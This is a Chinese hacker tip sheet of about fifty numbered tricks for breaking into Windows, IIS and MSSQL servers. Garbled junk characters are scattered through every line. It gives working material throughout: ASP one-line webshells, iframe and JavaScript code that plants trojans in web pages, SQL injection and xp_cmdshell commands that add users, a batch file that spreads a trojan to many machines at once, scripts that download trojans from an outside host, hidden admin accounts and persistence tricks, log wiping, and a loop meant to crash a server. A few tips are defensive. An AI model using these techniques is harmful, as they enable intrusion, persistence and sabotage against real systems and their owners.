1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,+ x% l8 \' v# X2 w9 V3 j* E
cacls C:\windows\system32 /G hqw20:R! m0 H$ c, B3 u6 V2 }5 n3 w+ w4 [
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
/ L5 i1 V* O/ z2 H恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F- R# z" L9 T* O& W
e/ o& T+ k' `9 }" b% f2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。% Y% w0 C% g4 Q0 o
3 z0 `5 q' M: i6 H3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。' W: P6 J% g2 g; Q6 h
4 t/ Y+ V5 h" v/ e4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
/ ^* {& q5 g* I R' w
# S3 [4 o/ b. z6 X- d5、利用INF文件来修改注册表
6 B9 Q# z+ t) q- \* y[Version]2 w' p6 R- O8 x" L$ b
Signature="$CHICAGO$"
3 `+ _$ }" P5 K% B[Defaultinstall]
( W4 T; H: z( D* p& B1 _addREG=Ating+ q9 A* E* M3 s4 B' U. b
[Ating]
# _: U6 r( {5 t5 aHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"6 H! i0 x. N X1 w/ ?
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
8 L! ]" j* a6 E2 L( o: \3 T+ n. zrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径; E5 k* M, o- w, Q0 g. I1 U) y
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU% z( {/ J6 u/ R( ^( D2 e
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU0 J# o) Z1 J- v3 v; }4 o2 y! h
HKEY_CURRENT_CONFIG 简写为 HKCC4 n- y1 d, @3 f
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
* R9 R$ y9 m( u9 c3 M1 |. t; ~"1"这里代表是写入或删除注册表键值中的具体数据
1 J5 e( [$ o9 V# w
3 q6 a# M2 J$ e, ?5 t" G6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,. m4 \* d; ]1 A! V/ q: ?' t
多了一步就是在防火墙里添加个端口,然后导出其键值
1 e6 s9 N5 M ~( K4 P t S" c$ k[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]% W% O: J: Y0 I
3 o9 q/ V1 ?" X, y, h/ j& A: o7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽 R% b5 ?9 c8 D. z
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
. N( T( E4 J, n7 j
& D2 o1 o- A. ?7 \' y8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。* n! i' C+ G) s. {; x5 ]1 t
0 g, `0 @! d9 v( S1 O
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,% v2 x! x0 j$ L* b
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
, Z: u0 R$ y5 J) ^+ z0 k
% g3 E7 ~6 G% B U* x10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
8 Z" A4 \6 R; s$ N* _# R6 G. e, I2 m; d9 H
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
& D& R! Q# Z" j' ^. n: \用法:xsniff –pass –hide –log pass.txt
8 N0 [! c- L% Y J6 i6 k4 v! ]. j! J
8 Q7 F, a5 I- C8 s0 R12、google搜索的艺术0 ?. B: @5 r: o( s0 m0 d
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”8 a; g8 Z. v0 ]4 @) P8 V
或“字符串的语法错误”可以找到很多sql注入漏洞。* ], x' W: M3 E. c2 Z9 f* G
9 x) t4 [/ U( Y# N, c D- p8 h- Y13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
6 m8 o) j" V$ u: d. {7 L+ p% j/ z7 i+ Q
14、cmd中输入 nc –vv –l –p 1987
: ~' L5 H! \/ ~* |9 f) y做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃0 ]: V6 F( ^ ^( S, g' J
( P* ]) T% J8 p9 @- r. V S15、制作T++木马,先写个ating.hta文件,内容为
% y$ H2 K% L: e<script language="VBScript">
, R& v2 t) {7 M5 F9 R- e* [set wshshell=createobject ("wscript.shell" )
H! ]4 B5 j0 B6 q4 t( _, v6 Ga=wshshell.run("你马的名称",1) T- P- Y p- V B- ?) B% j- ~3 V# F
window.close
- E& ?: j2 g: [4 p- ~: k5 ~! z) I$ ]; J</script>
3 r/ L5 x+ O/ m* Z' k# G4 L再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。, o- s2 p3 q# O; J1 @. B& h1 b/ J+ L3 y
& H* a0 j' _2 `& V' H16、搜索栏里输入
, n l! Z: v1 Z# g/ n8 Y关键字%'and 1=1 and '%'='* K% k& T7 j7 K8 N/ Z6 y3 w
关键字%'and 1=2 and '%'='$ c+ n) m8 L/ w3 k8 j
比较不同处 可以作为注入的特征字符0 p) Y( q2 o6 _1 \8 L
6 {' C b% Y' K2 `
17、挂马代码<html>
# z \0 |# m$ X/ k- D2 E! H<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
) S! I! d5 o4 ]+ g</html>
; |' W! P& t+ v3 T9 x/ A9 U; m/ b. i3 ?% N- x3 B: K3 T2 N' s: A
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,- A. x' j. F0 e( _2 W7 n' _
net localgroup administrators还是可以看出Guest是管理员来。
\0 N% ^ j, k1 A' D) h/ p) s$ r% L0 Y0 y) _! I1 e! [/ y
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
% y. o; e: g! W" i8 k/ `用法: 安装: instsrv.exe 服务名称 路径# c$ G) g. U' {
卸载: instsrv.exe 服务名称 REMOVE
# J) C0 @ ] O
0 A9 Y- s8 k, m- J% T0 t' x
' d0 X. s: J2 r6 Y0 B& B5 c: l21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
9 p9 r/ ?1 P0 k( h" n! j不能注入时要第一时间想到%5c暴库。
3 K- X( V0 f& d A8 H6 l2 i% ~8 R9 X a4 C Y' }0 }: ~4 {% r
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
6 J7 l5 o0 L8 Q, Y2 A
5 ?" ]& M" Q9 u* Q* r23、缺少xp_cmdshell时
7 _4 x K3 \! I' c. s' e尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( q4 K2 C6 X, h; S8 J& e8 G7 |
假如恢复不成功,可以尝试直接加用户(针对开3389的)
$ i) T6 ]' j. [; y; v) mdeclare @o int. z* Y- ^9 n( @5 ~9 k1 h
exec sp_oacreate 'wscript.shell',@o out3 P% L+ R1 R4 E0 {2 `# ~
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
# n9 z* `& B4 }- H6 r# D4 i
7 o4 m9 a, ~. `% I! m. O24.批量种植木马.bat5 t' X) j! a4 a8 L% @0 Z
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
. x" a- K2 z! }7 E" cfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
% N1 h& B! f% m) m: |扫描地址.txt里每个主机名一行 用\\开头 s& L7 R6 w5 i1 Z! G' F8 U
0 P" E+ Z) R% T4 |8 F* p/ ^$ x25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
, T3 ?+ ^5 O0 I. `
- V. T& z6 ?: J+ H26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
) N; q, G' d' u4 I1 _, c将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.! B1 P& f ^; |- l& |. k6 w9 Z
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
7 d! }# u! q7 X- A8 G( P* f0 S/ Z1 R F* Q* v, c* X
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP. {* E5 W6 \5 R0 B
然后用#clear logg和#clear line vty *删除日志
" r, e; U. j0 ^5 S: L
7 w' D, h$ l# e. _. ~, j28、电脑坏了省去重新安装系统的方法
5 P' ?% I% f! a/ M6 L- t$ J/ G7 e( g纯dos下执行,; U$ T8 F* U7 G4 ^
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config6 R2 [) d# p% m6 a1 ]* \: v* E4 K
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
) X! g( p, |7 M: r* J
; s% k$ e' e; E29、解决TCP/IP筛选 在注册表里有三处,分别是:9 W: R) K1 l! a) e: r6 p; z
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip/ Y: p) ^. K& S U* B, @
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ @: V) j) z* u% m4 ^# u: oHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 M9 @. [, [/ D7 L i
分别用# c( Y0 @5 z3 s( M! j- q
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 }4 }6 t+ j' H" n) I8 g. i
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip3 ?' X; k2 d" ~$ |
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
6 @* y h+ j5 L7 d" G! u7 D/ c命令来导出注册表项
) a! y* j% G: \6 a! K$ Q然后把三个文件里的EnableSecurityFilters"=dword:00000001,4 U) o. I; c4 J& ?0 v& S' |; j; _
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
/ s5 b- Z1 w, p7 Fregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
3 B( J- L, Y* t r. `
# X( J) M) L: g30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
$ y: r% l; r1 \' u$ \: fSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的30 Q, |! B* W g0 E' T/ T2 A
4 n- \) J3 T1 n9 T
31、全手工打造开3389工具% L" |0 T( Y% j8 V& c
打开记事本,编辑内容如下:2 _% S+ f+ M3 B+ A" ?0 X% u
echo [Components] > c:\sql& ?" ?( K* o( O3 |
echo TSEnable = on >> c:\sql& E C7 J/ R+ A5 u- j
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q, i4 k& N5 I8 J* V( N( X
编辑好后存为BAT文件,上传至肉鸡,执行' ]# ^4 p! E7 c7 z" r' j
* ?$ F9 Q- k% N3 F; p32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马: q+ C" W' L" z% b; n" o
R8 Z6 y0 c- n0 @7 B" B' \33、让服务器重启$ J$ s# X0 [9 Z
写个bat死循环:
7 Z# Q0 j# P8 @ e. a@echo off
8 D7 ?: @5 |' {$ k+ r- c:loop1
8 u( L( d' J- ucls) f/ {. p/ S P! i4 v" D8 C
start cmd.exe
: w! z# X' p6 b) tgoto loop1
: y: b/ r9 a& a* A( V7 u Q" N' t9 |保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启$ l" N1 H: A: H3 T" a7 ^! v1 b
5 ?' P$ S" B1 A7 F34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,& @" H3 U: H* E1 o9 g
@echo off
3 x/ V2 y* P* ] |5 Odate /t >c:/3389.txt3 n, @8 @0 C; Q6 |
time /t >>c:/3389.txt7 _3 u; m u( ^) z* E
attrib +s +h c:/3389.bat
* B' s# C. X3 u9 N2 R9 P3 ]attrib +s +h c:/3389.txt
9 j0 l& l, G/ h" g2 nnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt# x5 n. F% k# B; Y, z
并保存为3389.bat, @5 l" p$ C* G& v9 K7 j! b
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号# w8 r/ k1 J" P. p1 O* R, m
4 ]# m2 ` s+ c( E2 p6 d2 f35、有时候提不了权限的话,试试这个命令,在命令行里输入:5 e) ~) _' Z2 x3 x: J
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)2 v" n. N1 R h& O
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。+ m5 Y, {& Z ~! s' G
# x2 ]2 ~; {. p4 g
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
! [9 d5 N. b$ t! U% V/ _echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
4 A# h$ R) C. @& `echo 你的FTP账号 >>c:\1.bat //输入账号2 F% H( Z+ P H5 o- A$ K2 {; B
echo 你的FTP密码 >>c:\1.bat //输入密码 X4 b5 l) F* t* i
echo bin >>c:\1.bat //登入
9 K# {" X4 [% V/ O, Cecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么( z# m/ Y' u1 b5 g# j1 X
echo bye >>c:\1.bat //退出" W$ R* l1 m( u# p8 `' ^* S" X+ @
然后执行ftp -s:c:\1.bat即可
% o: R( O0 z% T- k" V3 T/ E3 _
; n4 T8 _6 O7 u& u37、修改注册表开3389两法
/ |% g! U, \; I( I5 t(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
: ]& C" t! {' f( Xecho Windows Registry Editor Version 5.00 >>3389.reg2 V* o* H# P' S2 i* M
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg% V$ K( L) n0 t$ y5 I. a% B6 |
echo "Enabled"="0" >>3389.reg# T7 u- }. _1 N- n1 C! R
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
5 M0 O/ s4 S( c7 TNT\CurrentVersion\Winlogon] >>3389.reg
1 X5 E7 Q8 J: Qecho "ShutdownWithoutLogon"="0" >>3389.reg0 J8 E/ W: [. V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]" w/ k3 `8 P) f$ g5 r
>>3389.reg
8 X- |% ]2 ^# _7 ?3 |6 v! N7 Q. xecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg4 M2 W# g4 U" E( F/ \+ A a7 p4 L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
$ w/ N: h) d( y2 V>>3389.reg' y' R! X, u; X" b3 T
echo "TSEnabled"=dword:00000001 >>3389.reg
8 w0 C0 G0 {/ q0 m, v6 ]0 Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg. Y- x" V- ]+ C) u/ w, @: u1 ^
echo "Start"=dword:00000002 >>3389.reg
/ L/ K5 z; t2 \' Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
" A* ]) c/ }% j. y8 R1 X>>3389.reg
: S$ D. ~. }) Z& d! u! m5 X% Xecho "Start"=dword:00000002 >>3389.reg
: r" i6 f6 W2 n2 v; j. o6 hecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
; t X, A, y3 E4 {- Qecho "Hotkey"="1" >>3389.reg! Z( Y( { T; d# Q1 @( F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 x2 ~* Y' |+ P: T' `# r' b
Server\Wds\rdpwd\Tds\tcp] >>3389.reg# A$ l" s: _/ z3 V
echo "PortNumber"=dword:00000D3D >>3389.reg
x& A' B" C8 O2 qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: k) w% b3 z! U+ Q4 K
Server\WinStations\RDP-Tcp] >>3389.reg
9 A( D$ W2 }- t" Gecho "PortNumber"=dword:00000D3D >>3389.reg
# n' c* u' {" g# j/ ~' H- t" [1 W把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
- @! m9 |! h5 n1 f) I$ I" T. |$ I(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
0 _9 b! d' g8 E# W3 U: w$ {3 L! X, K因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效0 x5 i2 x2 T9 o% x8 v+ p
(2)winxp和win2003终端开启
8 X# N5 f& s l! \; s, P$ e# I用以下ECHO代码写一个REG文件:
* P" q. S `/ S7 _, o- Q" @" { _# techo Windows Registry Editor Version 5.00>>3389.reg
6 t2 o& L9 y, [. o( |% xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 c8 d* N# Q( V5 e# ~1 v1 A
Server]>>3389.reg
- O/ e0 J* {4 {) C3 o6 Eecho "fDenyTSConnections"=dword:00000000>>3389.reg
1 q, s; X! s8 b5 Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% x- `( B6 I& X
Server\Wds\rdpwd\Tds\tcp]>>3389.reg/ P2 p+ O# N! |1 t6 G
echo "PortNumber"=dword:00000d3d>>3389.reg9 k" k3 F, {& A" Z% B( H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; t# n) M. ^4 M6 r( g, E$ t9 L. bServer\WinStations\RDP-Tcp]>>3389.reg
3 V; V* S0 n$ g( M4 Yecho "PortNumber"=dword:00000d3d>>3389.reg
$ K6 U& {: E* e- d! K3 x& z9 c* U然后regedit /s 3389.reg del 3389.reg* J7 B. m+ ]; O* n
XP下不论开终端还是改终端端口都不需重启
3 W# P' T2 N5 c2 X4 l8 m6 U- l4 B$ j% R2 \5 M. y! V; ]
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃. Q9 |, u$ D4 [$ R0 M
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
! E' R. k! h1 _* m, ?2 O
$ X" _1 N9 N$ D6 V39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!; z- f, L. ~ \8 ~* q" k% }
(1)数据库文件名应复杂并要有特殊字符
5 D+ ? D' ]( S$ U(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
0 P9 m1 Y4 Z- k/ @将conn.asp文档中的
8 Q S8 ^1 `! ^) jDBPath = Server.MapPath("数据库.mdb")
5 X+ T, i* |9 S* `0 e+ sconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
" P1 w8 W! h% y# S7 s7 @# h( t/ b% u0 P" W% n7 m2 S
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置7 z) M$ g0 b2 C7 f) y
(3)不放在WEB目录里
* M5 p- a$ L9 P' v3 q9 C
( j. V: I9 ?/ S T40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉$ [: n+ Y+ M5 c" B3 p+ ]0 [* R
可以写两个bat文件
: i6 K+ K# Y% t* P# P! }3 d@echo off
1 o. U* g1 P `6 d@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
( ]7 W4 M5 c6 P, v. O@del c:\winnt\system32\query.exe" |7 e$ q4 P, C$ ~) h+ r
@del %SYSTEMROOT%\system32\dllcache\query.exe
0 q7 ?6 A' W2 f- e; ~@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的8 s' x! x& f2 I
( X, v/ A5 d' h4 `( w@echo off
0 ~6 I3 v: m' k@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe6 b1 j- [% C4 t- q. n+ w0 ~
@del c:\winnt\system32\tsadmin.exe j! o) ]+ w' z% I
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex* @1 n" F, g- \# k
5 ~' O4 L6 r7 j" N41、映射对方盘符
o) x6 ]. |- E. T, m0 atelnet到他的机器上,1 G* g8 K' @. w; o. e: Z
net share 查看有没有默认共享 如果没有,那么就接着运行) C# M _, x' l# P: h4 ^
net share c$=c:
. [# T& v- m+ d; l1 s5 }; T' E4 ]) Xnet share现在有c$
! G' {( e& s* z5 F" E7 a0 N) K在自己的机器上运行
% a7 c5 O3 ]. x8 d8 Y4 ]net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K* _7 s4 D+ ? C$ E9 k
3 z# H8 z7 C' D1 d9 k' X7 G0 Q
42、一些很有用的老知识
& L) r4 \7 Z" }2 Otype c:\boot.ini ( 查看系统版本 )
% B' V& |( W( anet start (查看已经启动的服务)6 F2 f9 ]5 J+ `' u# d* A9 L( y- e/ U; T
query user ( 查看当前终端连接 )
7 g- P! p2 \. pnet user ( 查看当前用户 )0 y) J4 B* Y" C
net user 用户 密码/add ( 建立账号 )
3 n2 |9 R/ G. W" ~: h0 U! s9 lnet localgroup administrators 用户 /add (提升某用户为管理员)
4 @2 \$ W T; w, mipconfig -all ( 查看IP什么的 )/ a2 G' `* o- u1 t7 w( {9 i3 w
netstat -an ( 查看当前网络状态 )2 R0 ]4 K. a, p3 D. m9 p: H' t
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
0 m6 ~7 }9 k9 i1 @3 L克隆时Administrator对应1F46 L3 l, ~2 h% k9 X
guest对应1F5
: Z- U' l: [- k, ~0 qtsinternetuser对应3E8* J" @; n/ _& i2 r" P
( r" z W |+ K
43、如果对方没开3389,但是装了Remote Administrator Service
* h- S. W% w i' ]5 I0 n; [4 a, `$ `用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
' T& ]0 s3 k* k3 l" {2 g) o& F解释:用serv-u漏洞导入自己配制好的radmin的注册表信息* \2 z1 x2 R: y# x* I
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
2 Z+ S0 ^1 t6 U( u& c5 W) l. ~7 o/ c! \# [, @! ?
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
; W: B v6 z0 \% q本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
" j2 x/ k# \$ M. Z5 e# h
! i' U) I5 s- E3 s. E" a) F45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
1 u/ q7 @$ ]9 ~" Z+ cecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open8 n8 e. b$ b2 [" {% m
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =( w% B$ o8 ^3 A, {
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
# ]5 L& P/ w0 X% ] C+ ~0 G1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs# `) u0 O* k. X& A
(这是完整的一句话,其中没有换行符)/ u0 e# G7 x q
然后下载:$ J+ \% b9 w5 w- _: G1 K! j* z
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
3 v! u4 f* W$ S4 N( Z4 q" W" n% O$ h# P
46、一句话木马成功依赖于两个条件:+ D4 D2 w6 F* O" j
1、服务端没有禁止adodb.Stream或FSO组件3 x4 z% w: p6 Z( k3 z4 Q/ t
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。* I9 h3 O3 Z6 r/ [. i2 E1 L: @+ ^
P1 a8 ]8 B& S; p- E8 t6 D
47、利用DB_OWNER权限进行手工备份一句话木马的代码:; m: V$ V. z6 Z" X
;alter database utsz set RECOVERY FULL--
6 A' r0 g" t9 y( `# Q0 o! o;create table cmd (a image)--$ F3 I0 a- C: X) h( ]* ^) U
;backup log utsz to disk = 'D:\cmd' with init--* |5 {+ x' t- d* h* Q2 k1 j# }/ y
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--' E% t$ ^2 Q# t" h @, \( l; X2 |, ?
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
; l2 H& y+ h8 E5 H0 i- ]3 P注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。) j3 s! ^: ]1 U( E% x& p
) J7 ^: c! B. Q48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
. G: C6 I- t+ d/ E( }$ x% e8 o' A' R
: P; ^9 Z* p( l# h用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options/ b8 O- I$ x5 E I# Q5 a) f
所有会话用 'all'。% v1 a" N4 A8 j( n. n
-s sessionid 列出会话的信息。
+ h$ ^( ?0 ] _1 q-k sessionid 终止会话。" s& }! C: r, f) B9 r
-m sessionid 发送消息到会话。% |* O. g. \7 Q* A+ S
9 X+ \0 R0 P+ I& Q) \config 配置 telnet 服务器参数。 |1 V& }9 Y& N' r, s6 ], S% S* |
/ z: `5 k, f+ r+ rcommon_options 为:9 S: g& j; H- g' G5 R
-u user 指定要使用其凭据的用户
/ O* p$ G+ ]7 `* q e4 [( \-p password 用户密码
8 M# w. t: P) g- C6 i U6 A6 h$ p4 g7 h' R7 u1 R y
config_options 为:
, \% _/ ^, u, H1 \4 g5 Q6 |dom = domain 设定用户的默认域
: ^. E% Y& a! L( n0 k$ K% s6 Hctrlakeymap = yes|no 设定 ALT 键的映射( D {- q& S' v4 O
timeout = hh:mm:ss 设定空闲会话超时值
+ N6 b+ d! _3 w% btimeoutactive = yes|no 启用空闲会话。
' A% o- X: I4 m+ B5 h Amaxfail = attempts 设定断开前失败的登录企图数。% m, j" g0 V0 F E
maxconn = connections 设定最大连接数。
% ~/ s4 H$ @* R A- s! q3 v* P, b. mport = number 设定 telnet 端口。
( ~- U5 g8 N: s( o5 K3 Wsec = [+/-]NTLM [+/-]passwd
: x8 R r0 Q {, m8 N% q设定身份验证机构
; Z9 {7 T9 g* X4 E* O' s$ [fname = file 指定审计文件名。
6 X4 O0 F b# A+ q8 }* Ufsize = size 指定审计文件的最大尺寸(MB)。& L9 ]" a4 Y& q9 N* b( d: z0 |" z
mode = console|stream 指定操作模式。
5 S9 Z% Z; P) L, ?auditlocation = eventlog|file|both
4 F% d, v& ~3 ~6 {指定记录地点6 k# v7 F+ H0 T
audit = [+/-]user [+/-]fail [+/-]admin
?' @, A. L- i) K: D" ^
d, c% o7 U" X* u; _8 ?4 H; i49、例如:在IE上访问:$ i# e3 O9 F6 b: |
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
" @7 f: b- c; y. q% M5 F3 u2 qhack.txt里面的代码是:
7 g4 U% K0 G0 [! R0 H# Y+ o<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
) J+ ]( y- S+ l" f4 z3 r把这个hack.txt发到你空间就可以了!
" X; J6 E# [5 X! z- G这个可以利用来做网马哦!
2 X0 g! M- x6 r0 H, O. n" N# A
2 H' v& }" |+ l& `$ i50、autorun的病毒可以通过手动限制!
, v& w+ P5 [# B# u! s1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
k' W f! X! N, o2,打开盘符用右键打开!切忌双击盘符~( f, g, L% P1 T
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
* q( T% D9 O( L+ H+ K! ^7 \, R9 v7 i# W9 d6 J
51、log备份时的一句话木马:; ]0 i7 E# H5 y
a).<%%25Execute(request("go"))%%25>& w% k2 @5 l3 H7 e M* a
b).<%Execute(request("go"))%>3 i& w( ^* ^7 Y+ [
c).%><%execute request("go")%><%1 F+ U; m; S6 `. f t v
d).<script language=VBScript runat=server>execute request("sb")</Script>
" w/ t8 `( E$ g& se).<%25Execute(request("l"))%25>2 w0 W# R8 ]9 A- W3 K$ ^: n. h( h
f).<%if request("cmd")<>"" then execute request("pass")%>$ p3 U, H: H" h9 U2 I
( Y& o) L* U' f1 r/ @
52、at "12:17" /interactive cmd
' k k* V$ T% Z+ z% p2 l* L# o; w执行后可以用AT命令查看新加的任务
